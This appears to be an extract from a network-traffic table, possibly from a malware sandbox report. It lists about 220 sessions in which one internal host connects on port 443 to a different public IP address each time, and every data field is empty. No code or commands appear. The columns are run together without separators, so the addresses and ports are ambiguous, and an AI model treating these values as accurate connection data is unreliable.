                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15977192.168.2.2355292219.71.215.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15978192.168.2.2351330213.73.204.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15979192.168.2.2333308122.78.83.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15980192.168.2.2358540203.185.152.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15981192.168.2.2350704143.239.122.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15982192.168.2.2360526170.165.4.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15983192.168.2.234932081.177.9.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15984192.168.2.2359862144.98.162.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15985192.168.2.2349684167.1.24.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15986192.168.2.234944873.48.3.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15987192.168.2.235069488.187.23.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15988192.168.2.234638697.20.4.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15989192.168.2.233464023.218.208.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15990192.168.2.2352348166.248.246.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15991192.168.2.234207031.93.160.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15992192.168.2.236075457.160.40.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15993192.168.2.233760673.214.253.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15994192.168.2.235360823.153.186.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15995192.168.2.2360060165.233.77.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15996192.168.2.2359202195.215.142.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15997192.168.2.234036824.72.19.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15998192.168.2.233973238.149.130.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15999192.168.2.235767267.106.130.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16000192.168.2.2335920220.247.250.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16001192.168.2.2356052219.107.215.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16002192.168.2.233532476.108.64.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16003192.168.2.2348238110.106.68.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16004192.168.2.2344052146.212.77.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16005192.168.2.233985490.133.127.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16006192.168.2.2336848151.228.159.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16007192.168.2.234841070.145.222.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16008192.168.2.2359068221.185.140.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16009192.168.2.2354242113.60.11.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16010192.168.2.234108814.248.176.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16011192.168.2.235765065.178.54.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16012192.168.2.235970278.202.31.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16013192.168.2.2342314126.220.72.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16014192.168.2.2334876164.105.122.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16015192.168.2.2352934221.73.25.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16016192.168.2.2358958145.33.120.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16017192.168.2.2358530183.7.5.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16018192.168.2.2349816182.242.28.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16019192.168.2.233877482.199.82.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16020192.168.2.235125076.31.4.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16021192.168.2.2341550104.161.5.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16022192.168.2.2346084180.31.65.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16023192.168.2.23562164.137.122.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16024192.168.2.235119272.255.75.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16025192.168.2.2358992159.255.191.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16026192.168.2.2353486156.138.53.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16027192.168.2.2339468200.114.215.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16028192.168.2.2343006125.40.63.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16029192.168.2.2356806101.108.68.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16030192.168.2.2341044166.234.47.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16031192.168.2.2357740170.5.27.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16032192.168.2.233958878.111.70.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16033192.168.2.235856031.130.113.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16034192.168.2.2353000178.130.120.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16035192.168.2.2358038119.39.152.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16036192.168.2.2359004189.139.240.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16037192.168.2.2359404162.136.22.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16038192.168.2.2360790128.145.1.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16039192.168.2.2351732219.240.104.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16040192.168.2.2353976112.46.90.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16041192.168.2.2346796223.177.59.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16042192.168.2.2335712150.85.116.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16043192.168.2.2358010159.76.234.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16044192.168.2.234074252.89.249.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16045192.168.2.234650835.189.246.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16046192.168.2.233589249.169.234.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16047192.168.2.236008080.86.107.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16048192.168.2.234453848.109.243.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16049192.168.2.2335880198.96.147.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16050192.168.2.2357382141.35.78.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16051192.168.2.2350882212.128.136.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16052192.168.2.2338322205.184.96.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16053192.168.2.233466264.12.2.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16054192.168.2.2340532212.106.79.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16055192.168.2.233538025.139.137.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16056192.168.2.2342078111.180.106.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16057192.168.2.2341586164.34.2.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16058192.168.2.2350758182.158.80.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16059192.168.2.2346014117.50.89.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16060192.168.2.2340902221.13.210.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16061192.168.2.2346262117.110.6.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16062192.168.2.2332872130.66.121.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16063192.168.2.2340862172.98.113.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16064192.168.2.2337802213.157.105.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16065192.168.2.2340384219.20.64.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16066192.168.2.234324472.206.104.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16067192.168.2.235854219.155.22.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16068192.168.2.2352172221.27.22.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16069192.168.2.235740485.164.152.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16070192.168.2.2352966189.57.182.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16071192.168.2.2340428115.21.191.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16072192.168.2.2357626136.40.198.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16073192.168.2.2344808144.136.208.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16074192.168.2.2352594162.18.145.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16075192.168.2.235635294.152.90.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16076192.168.2.233629432.34.132.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16077192.168.2.2351246160.107.232.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16078192.168.2.235451254.154.66.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16079192.168.2.233586858.89.11.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16080192.168.2.2352514196.190.65.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16081192.168.2.2339550205.249.0.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16082192.168.2.233949872.21.42.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16083192.168.2.235419083.244.56.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16084192.168.2.2335408105.99.122.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16085192.168.2.2349890181.184.234.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16086192.168.2.2358918162.115.216.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16087192.168.2.2359044190.29.191.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16088192.168.2.2350418161.59.56.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16089192.168.2.2338846167.83.27.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16090192.168.2.2359134221.18.55.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16091192.168.2.2345848101.48.49.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16092192.168.2.235832060.13.63.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16093192.168.2.2352340181.15.52.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16094192.168.2.2357586221.148.42.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16095192.168.2.235243034.114.203.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16096192.168.2.236034053.134.45.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16097192.168.2.2335308159.154.154.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16098192.168.2.2349610156.152.222.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16099192.168.2.2344688199.249.158.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16100192.168.2.235805653.88.153.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16101192.168.2.2338152221.247.0.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16102192.168.2.235840288.235.0.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16103192.168.2.2339752121.151.133.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16104192.168.2.2333150202.242.173.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16105192.168.2.2338184144.165.9.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16106192.168.2.2334810139.191.23.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16107192.168.2.235454032.126.33.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16108192.168.2.2348448156.77.227.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16109192.168.2.23421729.68.73.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16110192.168.2.2357412126.80.134.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16111192.168.2.2335520162.188.160.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16112192.168.2.2355018178.47.131.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16113192.168.2.2341590137.255.212.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16114192.168.2.2351460218.250.1.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16115192.168.2.2337630135.3.63.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16116192.168.2.2359930105.74.198.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16117192.168.2.2339762166.82.141.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16118192.168.2.2338756194.190.56.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16119192.168.2.2349620164.64.194.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16120192.168.2.234550635.62.149.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16121192.168.2.2338242212.78.158.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16122192.168.2.233715238.179.232.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16123192.168.2.23330482.31.97.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16124192.168.2.233509831.105.197.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16125192.168.2.23477245.145.42.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16126192.168.2.235952891.209.51.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16127192.168.2.2352234122.100.165.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16128192.168.2.2337548178.123.46.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16129192.168.2.23380461.20.82.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16130192.168.2.2340548154.3.75.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16131192.168.2.233574297.119.241.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16132192.168.2.2360678168.129.162.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16133192.168.2.235514090.184.189.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16134192.168.2.23333161.160.155.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16135192.168.2.2333034178.3.67.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16136192.168.2.2333994213.22.98.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16137192.168.2.2340200109.215.253.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16138192.168.2.233691691.96.149.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16139192.168.2.234939689.196.157.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16140192.168.2.2343950147.19.198.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16141192.168.2.2354148103.5.97.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16142192.168.2.2351610217.159.228.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16143192.168.2.235776638.45.71.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16144192.168.2.2346810167.200.17.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16145192.168.2.2343452157.36.61.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16146192.168.2.2353848132.124.200.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16147192.168.2.235853890.6.171.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16148192.168.2.2354612134.43.138.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16149192.168.2.235627464.172.108.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16150192.168.2.2353912131.147.22.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16151192.168.2.234396031.100.113.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16152192.168.2.2348618178.82.164.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16153192.168.2.2336716185.252.42.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16154192.168.2.2348448205.77.124.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16155192.168.2.2347630204.215.38.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16156192.168.2.2359906128.17.200.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16157192.168.2.2347836207.98.39.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16158192.168.2.235289619.191.30.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16159192.168.2.2351910162.167.114.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16160192.168.2.2357886101.105.200.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16161192.168.2.2360916155.21.74.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16162192.168.2.2355768185.122.101.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16163192.168.2.235517837.90.222.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16164192.168.2.234504275.78.161.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16165192.168.2.235665082.62.40.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16166192.168.2.2347250193.148.8.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16167192.168.2.234952891.145.92.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16168192.168.2.2356166221.21.113.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16169192.168.2.235493290.152.47.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16170192.168.2.2348250129.146.0.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16171192.168.2.2338822103.198.228.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16172192.168.2.2350516195.37.135.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16173192.168.2.23414625.171.42.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16174192.168.2.2354460212.52.200.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16175192.168.2.2356686150.107.69.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16176192.168.2.2352710173.54.248.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16177192.168.2.2347426108.194.77.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16178192.168.2.234178693.18.255.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16179192.168.2.2346200223.1.62.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16180192.168.2.2356390140.217.155.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16181192.168.2.2346944129.49.0.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16182192.168.2.234412694.82.198.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16183192.168.2.2359118208.177.50.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16184192.168.2.2347972217.91.144.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16185192.168.2.2344336108.104.5.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16186192.168.2.2359668158.244.12.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16187192.168.2.235162237.248.96.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16188192.168.2.2339944203.142.231.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16189192.168.2.233749214.42.153.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16190192.168.2.2358182180.30.27.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16191192.168.2.2350506118.124.83.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16192192.168.2.2340524210.167.223.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16193192.168.2.234292058.104.21.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16194192.168.2.2336358162.19.45.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16195192.168.2.234928873.43.31.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16196192.168.2.2336742193.194.146.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16197192.168.2.2347502150.199.139.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
